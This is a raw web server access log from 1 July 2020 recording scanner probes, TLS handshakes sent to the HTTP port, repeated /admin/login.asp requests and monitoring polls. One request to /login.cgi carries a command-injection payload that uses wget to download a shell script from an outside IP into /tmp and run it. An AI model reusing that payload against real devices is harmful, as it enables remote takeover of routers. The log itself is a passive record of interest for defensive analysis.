81.92.60.220 - - [01/Jul/2020:04:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
192.241.227.232 - - [01/Jul/2020:04:24:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.39.11.105 - - [01/Jul/2020:04:24:56 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
47.244.0.10 - - [01/Jul/2020:04:28:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.70.140 - - [01/Jul/2020:04:28:55 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.80:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
117.194.73.39 - - [01/Jul/2020:04:33:05 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
52.36.165.25 - - [01/Jul/2020:04:34:54 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
185.39.11.105 - - [01/Jul/2020:04:38:33 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
80.82.70.140 - - [01/Jul/2020:04:41:36 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.88:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
171.67.71.93 - - [01/Jul/2020:04:41:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
80.82.70.140 - - [01/Jul/2020:04:47:55 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.86:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
193.118.55.146 - - [01/Jul/2020:04:51:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
171.67.71.93 - - [01/Jul/2020:04:52:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.236.247.64 - - [01/Jul/2020:04:55:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.182.150.250 - - [01/Jul/2020:04:56:09 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
185.39.11.105 - - [01/Jul/2020:04:56:11 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
101.128.76.182 - - [01/Jul/2020:04:57:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
52.53.222.38 - - [01/Jul/2020:04:57:26 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
194.180.224.130 - - [01/Jul/2020:04:57:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
41.215.23.66 - - [01/Jul/2020:05:02:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
193.118.53.202 - - [01/Jul/2020:05:06:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
194.180.224.130 - - [01/Jul/2020:05:11:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
194.180.224.130 - - [01/Jul/2020:05:15:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
207.46.13.221 - - [01/Jul/2020:05:17:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
80.82.70.140 - - [01/Jul/2020:05:18:13 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.85:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
171.67.71.93 - - [01/Jul/2020:05:18:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
182.155.209.113 - - [01/Jul/2020:05:18:48 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
80.82.70.140 - - [01/Jul/2020:05:25:24 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.89:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
71.6.232.4 - - [01/Jul/2020:05:26:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
194.180.224.130 - - [01/Jul/2020:05:27:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
61.69.161.206 - - [01/Jul/2020:05:28:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
14.102.49.51 - - [01/Jul/2020:05:29:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
181.81.247.166 - - [01/Jul/2020:05:29:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
171.67.71.93 - - [01/Jul/2020:05:29:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.230.9 - - [01/Jul/2020:05:29:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
171.67.71.93 - - [01/Jul/2020:05:29:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
171.67.71.93 - - [01/Jul/2020:05:30:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
171.67.71.93 - - [01/Jul/2020:05:30:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
171.67.71.93 - - [01/Jul/2020:05:31:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.230.9 - - [01/Jul/2020:05:31:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.230.9 - - [01/Jul/2020:05:31:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.230.9 - - [01/Jul/2020:05:32:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.70.140 - - [01/Jul/2020:05:32:08 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.87:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
192.241.230.9 - - [01/Jul/2020:05:32:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.230.9 - - [01/Jul/2020:05:33:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
190.121.195.174 - - [01/Jul/2020:05:33:11 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
192.241.230.9 - - [01/Jul/2020:05:33:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.230.9 - - [01/Jul/2020:05:33:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.230.9 - - [01/Jul/2020:05:34:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
192.241.230.9 - - [01/Jul/2020:05:34:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
171.67.71.93 - - [01/Jul/2020:05:38:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
171.67.71.93 - - [01/Jul/2020:05:38:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.70.140 - - [01/Jul/2020:05:39:36 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.82:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
114.35.94.156 - - [01/Jul/2020:05:40:15 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
171.67.71.93 - - [01/Jul/2020:05:40:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
193.118.53.194 - - [01/Jul/2020:05:41:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
220.130.246.91 - - [01/Jul/2020:05:42:17 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
171.67.71.93 - - [01/Jul/2020:05:43:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
46.101.171.183 - - [01/Jul/2020:05:43:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
196.52.43.126 - - [01/Jul/2020:05:43:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36"
54.203.129.191 - - [01/Jul/2020:05:44:46 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
185.220.101.214 - - [01/Jul/2020:05:48:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
86.125.245.128 - - [01/Jul/2020:05:49:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.118.53.202 - - [01/Jul/2020:05:51:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
80.82.70.140 - - [01/Jul/2020:05:52:15 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.81:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
185.220.101.230 - - [01/Jul/2020:05:58:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
103.65.195.165 - - [01/Jul/2020:05:59:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
213.61.218.54 - - [01/Jul/2020:06:01:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "spider"
78.189.55.159 - - [01/Jul/2020:06:01:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
5.189.152.125 - - [01/Jul/2020:06:01:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
128.201.67.205 - - [01/Jul/2020:06:01:49 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
114.35.32.238 - - [01/Jul/2020:06:02:13 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
52.53.222.38 - - [01/Jul/2020:06:04:21 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
191.242.246.222 - - [01/Jul/2020:06:05:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
35.190.190.165 - - [01/Jul/2020:06:05:23 +0200] "GET /robots.txt HTTP/1.0" 404 330 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
35.190.190.165 - - [01/Jul/2020:06:05:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
114.35.112.199 - - [01/Jul/2020:06:06:35 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
71.6.232.4 - - [01/Jul/2020:06:07:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
114.34.163.241 - - [01/Jul/2020:06:07:52 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
162.247.74.216 - - [01/Jul/2020:06:09:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
103.74.109.125 - - [01/Jul/2020:06:12:22 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
80.82.70.140 - - [01/Jul/2020:06:14:13 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.84:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
194.180.224.130 - - [01/Jul/2020:06:14:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
167.250.64.150 - - [01/Jul/2020:06:15:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.3.252.134 - - [01/Jul/2020:06:16:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
122.117.26.207 - - [01/Jul/2020:06:17:49 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
181.78.4.182 - - [01/Jul/2020:06:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
172.104.108.109 - - [01/Jul/2020:06:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
196.52.43.98 - - [01/Jul/2020:06:25:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36"
171.67.71.93 - - [01/Jul/2020:06:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
171.67.71.93 - - [01/Jul/2020:06:31:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.201.204.173 - - [01/Jul/2020:06:34:00 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
59.127.188.206 - - [01/Jul/2020:06:36:51 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
13.56.209.56 - - [01/Jul/2020:06:38:42 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
103.26.98.83 - - [01/Jul/2020:06:43:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
42.115.87.122 - - [01/Jul/2020:06:45:55 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
169.255.5.214 - - [01/Jul/2020:06:46:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
129.144.8.28 - - [01/Jul/2020:06:47:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
193.218.118.130 - - [01/Jul/2020:06:51:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
194.180.224.130 - - [01/Jul/2020:06:57:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
59.153.97.179 - - [01/Jul/2020:07:00:16 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Jul/2020:07:00:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:01:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:02:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:03:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:04:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:05:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:06:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:07:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.119.197 - - [01/Jul/2020:07:08:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
212.91.246.72 - - [01/Jul/2020:07:08:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.34.95 - - [01/Jul/2020:07:08:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
177.86.76.153 - - [01/Jul/2020:07:09:06 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
177.86.76.153 - - [01/Jul/2020:07:09:09 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Jul/2020:07:09:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.86.76.153 - - [01/Jul/2020:07:09:37 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
177.86.76.153 - - [01/Jul/2020:07:10:03 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
177.86.76.153 - - [01/Jul/2020:07:10:05 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
177.86.76.153 - - [01/Jul/2020:07:10:19 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Jul/2020:07:10:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.86.76.153 - - [01/Jul/2020:07:11:15 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
177.86.76.153 - - [01/Jul/2020:07:11:20 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
192.35.168.248 - - [01/Jul/2020:07:11:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
192.35.168.248 - - [01/Jul/2020:07:11:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Jul/2020:07:11:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
181.143.209.34 - - [01/Jul/2020:07:11:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Jul/2020:07:12:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.86.76.153 - - [01/Jul/2020:07:12:51 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
103.12.162.184 - - [01/Jul/2020:07:12:53 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Jul/2020:07:13:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:14:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.86.76.153 - - [01/Jul/2020:07:15:08 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
79.116.19.59 - - [01/Jul/2020:07:15:12 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Jul/2020:07:15:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:16:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:17:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:18:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.249.230.187 - - [01/Jul/2020:07:18:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
212.91.246.72 - - [01/Jul/2020:07:19:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.53.222.38 - - [01/Jul/2020:07:19:40 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
51.15.1.221 - - [01/Jul/2020:07:19:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
5.54.1.100 - - [01/Jul/2020:07:20:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
